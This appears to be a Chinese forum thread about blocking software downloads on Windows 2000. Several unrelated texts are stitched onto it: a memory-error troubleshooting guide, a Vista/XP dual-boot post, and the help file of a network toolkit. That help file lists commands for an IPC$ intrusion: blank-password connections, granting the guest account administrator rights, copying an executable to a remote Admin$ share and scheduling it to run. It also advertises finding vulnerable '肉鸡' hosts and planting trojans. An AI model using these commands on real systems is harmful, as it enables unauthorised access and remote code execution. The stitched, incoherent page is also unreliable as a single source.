请问在win2000下怎样使机子不能下载软件?

guqing2008 2003-08-19 09:11:15
多谢!
...全文
35 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
yinshulin 2003-10-02
  • 打赏
  • 举报
回复
我的系统是在ghost的之后出现这样的问题的,可能与这个有关的,只要把主板驱动重装一下就没有问题了
harrydavid 2003-08-19
  • 打赏
  • 举报
回复
将用户权限设置为只能看文件不就解决了。
aobao 2003-08-19
  • 打赏
  • 举报
回复
设定成限制级用户,下载也无法安装.让他费那劲!
doking1999 2003-08-19
  • 打赏
  • 举报
回复
IE→属性→安全→自定义级别→文件下载禁用
设置完成后就不可以下载了~~~
zyp77 2003-08-19
  • 打赏
  • 举报
回复
关注
guqing2008 2003-08-19
  • 打赏
  • 举报
回复
我是希望实现不能下载。
yinshulin 2003-08-19
  • 打赏
  • 举报
回复
你认为是2K的问题吗?
这可不见得呀,可能是你的机子已中了冲击波吗,其它的子网页能打开吗?
该内存不能为“read”或“written解决方案 运行某些程序的时候,有时会出现内存错误的提示,然后该程序就关闭。 “0x????????”指令引用的“0x????????”内存。该内存不能为“read”。 “0x????????”指令引用的“0x????????”内存,该内存不能为“written”。 一般出现这个现象有方面的,一是硬件,即内存方面有问题,二是软件,这就有多方面的问题了。 故障分析 硬件方面: 一般来说,内存出现问题的可能性并不大,主要方面是:内存条坏了、内存质量有问题,还有就是 2 个不 同牌子不同容量的内存混插,也比较容易出现不兼容的情况,同时还要注意散热问题,特别是超频后。你 可以使用MemTest 这个软件来检测一下内存,它可以彻底的检测出内存的稳定度。 假如是双内存,而且是不同品牌的内存条混插或者买了二手内存时,出现这个问题,这时,就要检查是不 是内存出问题了或者和其它硬件不兼容。 软件方面: 先简单说说原理:内存有个存放数据的地方叫缓冲区,当程序把数据放在其一位置时,因为没有足够空间, 就会发生溢出现象。举个例子:一个桶子只能将一斤的水,当放入两斤的水进入时,就会溢出来。而系统 则是在屏幕上表现出来。这个问题,经常出现在 windows2000 和 XP 系统上,Windows 2000/XP 对硬件的 要求是很苛刻的,一旦遇到资源死锁、溢出或者类似 Windows 98 里的非法操作,系统为保持稳定,就会出 现上述情况。另外也可能是硬件设备之间的兼容性不好造成的。 几个例子 例一:打开 IE 浏览器或者没过几分钟就会出现"0x70dcf39f"指令引用的"0x00000000"内存。该内存不能为 “read”。要终止程序,请单击“确定”的信息框,单击“确定”后,又出现“发生内部错误,您正在使用的其中 一个窗口即将关闭”的信息框,关闭该提示信息后,IE浏览器也被关闭。 解决方法:修复或升级 IE 浏览器,同时打上补丁。看过其中一个修复方法是,Win2000 自升级,也就是 Win2000升级到Win2000,其实这种方法也就是把系统还原到系统初始的状态下。比如你的IE升级到了6.0, 自升级后,会被IE5.0代替。 例二:在windows xp下双击光盘里面的“AutoRun.exe”文件,显示“0x77f745cc”指令引用的“0x00000078”内 存。该内存不能为“written”,要终止程序,请单击“确定”,而在Windows 98里运行却正常。 解决方法:这可能是系统的兼容性问题,winXP 的系统,右键“AutoRun.exe”文件,属性,兼容性,把“用 兼容模式运行这个程序”项选择上,并选择“Windows 98/Me”。win2000如果打了SP的补丁后,只要开始, 运行,输入:regsvr32 c:\winnt\apppatch\slayerui.dll。右键,属性,也会出现兼容性的选项。 例三:RealOne Gold关闭时出现错误,以前一直使用正常,最近却在每次关闭时出现“0xffffffff”指令引用的 “0xffffffff”内存。该内存不能为“read” 的提示。 解决方法:当使用的输入法为微软拼音输入法 2003,并且隐藏语言栏时(不隐藏时没问题)关闭 RealOne 就会出现这个问题,因此在关闭 RealOne 之前可以显示语言栏或者将任意其他输入法作为当前输入法来解 决这个问题。 例四:我的豪杰超级解霸自从上网后就不能播放了,每次都提示“Ox060692f6”(每次变化)指令引用的 “Oxff000011”内存不能为“read”,终止程序请按确定。 解决方法:试试重装豪杰超级解霸,如果重装后还会,到官方网站下载相应版本的补丁试试。还不行,只好 换就用别的播放器试试了。 例五:双击一个游戏的快捷方式,“Ox77f5cdO”指令引用“Oxffffffff”内存,该内存不能为“read” ,并且提示 Client.dat程序错误。 解决方法:重装显卡的最新驱动程序,然后下载并且安装DirectX9.0。 例六:一个朋友发信息过来,我的电脑便出现了错误信息:“0*772b548f”指令引用的“0*00303033”内存,该 内存不能为“written”,然后QQ自动下线,而再打开QQ,发现了他发过来的十几条的信息。 解决方法:这是对方利用QQ的BUG,发送特殊的代码,做QQ出错,只要打上补丁或升级到最新版本, 就没事了。 例七:我的笔记本电脑用的XP系统,有时关闭网页时会弹出tbrowser.exe遇到问题需要关闭,然后有弹出 0x03e7c738指令引用的0x03e7c738内存,该内存不能为read,请问是怎么回事? 解决方法:先查杀一下病毒,另外如果你安装了浏
::: 啊D网络工具包 帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便] 3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!] 4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便] 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!] 6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!] 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!] 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626] 4. 端口扫描 [使你更加了解对方主机端口的打开状况] 5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址] 6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!] 7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!] 8. Ping [判断某IP是否和网络连接的好帮手!] 9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!] 10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!] 11. Finger [Finger能为你查询对方系统的用户信息!] 12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!] 13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!] 14. 常用修改 [反恶意网页修改,恢复系统设置等] 19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!] --------------------------------------------------------------------------------- 支持的系统:win98/WinMe/win2000/WinXP/WinNT 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 =================================== 关于 =================================== 制作人: 啊D QQ号码: 9269563 邮 箱: paf@163.net 网 址: http://d99.126.com 地 址: 深圳市龙岗区坪山镇石井太阳村 如果觉得本软件不错,请发一份电子信件, 表示对作者的支持! 在使用中发现错误,请记下你的测试环境,告诉我!以便更好地解决问题,先谢! 注: 本软件为免费软件,对使用本软件产生的后果,由使用者承担! 本软件可随意转载,转载时请确保文件的完整!未经同意,请勿用于商业用途! ================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ ================================================================= 更新 ================================================================= DTools 2.01 更新情况(2004.4.3) * 更新了过期问题。 * 加入公告板。 DTools 2.0 更新情况(2003.8.15) * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! * 在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!减少了复制、粘贴的工作量! DTools 1.01 更新情况(2003.4.20) * 增加了网卡MAC地址查看功能! * 增加了肉鸡(IPC$)查找功能! * 增加了木马(IPC$)种植! * 增加了读取NT用户列表功能! * 增加了Finger功能! * 增强了共享资源查找器的功能,在win2000下能查找 C$ D$ .. IPC$ ADMIN$ 等隐藏共享目录 * 修改了共享查找的介面 * 删除了密码查看功能 * 修正了在Win2000不能运行的问题 * 修正了一些Bug * 介面作了少量改动! * 添加了"在桌面加入快捷方式"的功能! * 外置了端口说明!
依然还是,不是我的笔记本,朋友的笔记本,dell Vostro Notebook 1200笔记本,号称安装vista home正式版操作系统,朋友对vista实在感到比较不方便,因此想让安装一套xp系统,但原来的vista系统由于笔记本为公司所配,不想破坏(虽然这个dell笔记本已经有专门分区留有镜像),因此想在vista并存的情况下安装一套xp系统。 大家都知道,由windows低版本向高版本安装,很简单,xp安装vista也不例外,老老实实的在安装完xp后,依然安装vista后,启动菜单自然就OK了,选择进入即可。但由高版本向低版本安装,就不那么简单了。当然,由win2003向下安装xp、win2000,这现在来说是很简单的了,就那两个启动文件而已,这个以前说过,把ntldr.dll和ntdetect.dll备份好就行了,安装完低版本的,把高版本的这两个文件覆盖到启动区,然后添加boot.ini启动菜单项就可以了。vista刚流行开来,我的2004年的破机子安装vista后比较迟钝,也没正式用,因此,对于这个vista下的启动引导来说,还不是太熟悉,也不知道怎么具体操作在vista下安装完xp以后,再恢复vista的启动菜单控制。不过,没关系,强大的百度,可爱的google在这里,还有什么信息不可能知道? 大概搜索了下,此类问题和解答也是比较多的:http://www.baidu.com/s?wd=vista%CF%C2%BB%D6%B8%B4xp%C6%F4%B6%AF&lm=0&si=&rn=10&ie=gb2312&ct=0&cl=3&f=1&rsp=0,都信誓旦旦的说自己亲自试验过,完全没有问题,但我发现有些问题处理得比较笼统,比如下面的这个解决方法,发现大量的重复搜索结果,互联网真是一个cp的垃圾场,实用不实用的方法,都到处乱载。 一般XP系统还原,或装上XPwindows故障恢复控制台都会这样.最快的办法就是下面的了,没有Vista光盘,可以下载它的光盘镜像,格式为ISO,两G多. 1.插入Vista光盘,或使用 Daemon Tools 加载 Vista 光盘像。

9,505

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧